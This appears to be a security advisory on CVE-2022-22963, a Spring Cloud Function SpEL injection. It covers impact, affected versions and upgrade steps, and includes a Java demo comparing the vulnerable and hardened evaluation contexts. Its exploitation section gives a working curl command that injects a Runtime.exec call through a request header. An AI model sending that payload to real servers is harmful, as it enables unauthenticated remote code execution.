CVE-2022-22963: Spring Cloud Function RCE Vulnerability
Spring Cloud has published a security bulletin for a SpEL expression injection vulnerability (CVE-2022-22963) in Spring Cloud Function. An unauthenticated attacker can send a crafted HTTP request that carries a malicious SpEL expression in a specific request header (spring.cloud.function.routing-expression); the server evaluates the expression, resulting in remote arbitrary code execution.
What is Spring Cloud Function
Spring is a lightweight, open source Java application framework used by millions of developers to build high-performing, easily testable code. The Spring Cloud Function framework lets developers use Spring features to build cloud-agnostic functions. These functions can be deployed as stand-alone classes on any cloud platform, including as serverless functions.
Spring Cloud Function's main benefit is that it brings the familiar Spring Boot features, such as auto-configuration and dependency injection, to those functions.
CVE-2022–22963
In some configurations, exploitation is trivial: an attacker only needs to deliver a single crafted HTTP request to a vulnerable host. Other configurations will need more research to develop a working payload. In either case an unauthenticated attacker can use this flaw to execute arbitrary code on the victim machine.
Impact of CVE-2022–22963
The vulnerability carries a CVSS base score of 9.8 (Critical). Successful exploitation runs arbitrary commands on the host or container and can fully compromise it. Because Spring Cloud Function is frequently used to build cloud serverless functions, those functions can be vulnerable in the same way, and code execution inside a function may give the attacker a foothold in your cloud account. Affected Spring Cloud Function versions:
- 3.1.6
- 3.2.2
- Older, unsupported versions are also affected.
Exploiting CVE-2022–22963
This GitHub repository contains Docker images so you can run the vulnerable application and try the exploitation yourself. Exploiting the vulnerability is quite easy: the curl command below POSTs to the /functionRouter endpoint (192.168.1.2:8080 is the example target) with a SpEL expression in the spring.cloud.function.routing-expression header that calls java.lang.Runtime to create the file /tmp/pwned on the target. Confirm success by checking for that file inside the target container.
curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/pwned\")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'
A more detailed Python script that returns a reverse shell is linked here.
Remediation
Spring has published fixed releases for CVE-2022-22963, and affected users are encouraged to upgrade to an unaffected [version](https://github.com/spring-cloud/spring-cloud-function/releases/tag/v3.2.3). No other steps are necessary. Releases that fix this issue include Spring Cloud Function versions:
- 3.1.7
- 3.2.3
- And later versions
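To show why the header is dangerous and what the fix changes, here is an added example; it is not code from the spring-cloud-function project. It evaluates a header-supplied SpEL expression first with StandardEvaluationContext, which honours T(...) type references and therefore lets the payload used above reach java.lang.Runtime, and then with SimpleEvaluationContext, the restricted read-only data-binding context that the fixed releases use for header-supplied routing expressions. The class name, the routeVulnerable/routeHardened helpers and the sample header maps are this example's own; a read of a system property stands in for the Runtime.exec payload so the demo is harmless. It needs spring-expression (org.springframework:spring-expression) on the classpath.

```java
import java.util.Map;

import org.springframework.expression.EvaluationContext;
import org.springframework.expression.Expression;
import org.springframework.expression.spel.SpelEvaluationException;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

// Added illustration of the CVE-2022-22963 root cause and fix; not spring-cloud-function code.
public class RoutingExpressionDemo {

    // The request header that carries the attacker-controlled routing expression.
    static final String ROUTING_HEADER = "spring.cloud.function.routing-expression";

    private static final SpelExpressionParser PARSER = new SpelExpressionParser();

    // Vulnerable pattern: StandardEvaluationContext allows T(...) type references and
    // arbitrary method invocation, so a header value can reach java.lang.Runtime.
    static Object routeVulnerable(Map<String, Object> headers) {
        Expression expr = PARSER.parseExpression((String) headers.get(ROUTING_HEADER));
        EvaluationContext ctx = new StandardEvaluationContext(headers);
        return expr.getValue(ctx);
    }

    // Hardened pattern: SimpleEvaluationContext only offers read-only property access on
    // the root object; T(...) is rejected with a SpelEvaluationException (TYPE_NOT_FOUND).
    static Object routeHardened(Map<String, Object> headers) {
        Expression expr = PARSER.parseExpression((String) headers.get(ROUTING_HEADER));
        EvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding()
                .withRootObject(headers)
                .build();
        return expr.getValue(ctx);
    }

    public static void main(String[] args) {
        // Constructed sample headers: a legitimate route name, and an injected type
        // reference that reads a system property in place of Runtime.exec(...).
        Map<String, Object> benign = Map.of(ROUTING_HEADER, "'uppercase'");
        Map<String, Object> malicious = Map.of(ROUTING_HEADER,
                "T(java.lang.System).getProperty('os.name')");

        // Both contexts resolve a plain function name.
        System.out.println("benign / vulnerable ctx : " + routeVulnerable(benign));
        System.out.println("benign / hardened ctx   : " + routeHardened(benign));

        // The vulnerable context honours the type reference and executes the call.
        System.out.println("malicious / vulnerable  : " + routeVulnerable(malicious));

        // The hardened context refuses to resolve the type, so the payload never runs.
        try {
            routeHardened(malicious);
            System.out.println("malicious / hardened    : UNEXPECTEDLY evaluated");
        } catch (SpelEvaluationException e) {
            System.out.println("malicious / hardened    : rejected, " + e.getMessageCode());
        }
    }
}
```

Swapping the evaluation context is the whole fix for header-supplied input; expressions configured by the operator in application properties are a different trust boundary and are still evaluated with the standard context, which is why only the header path is in scope for this CVE.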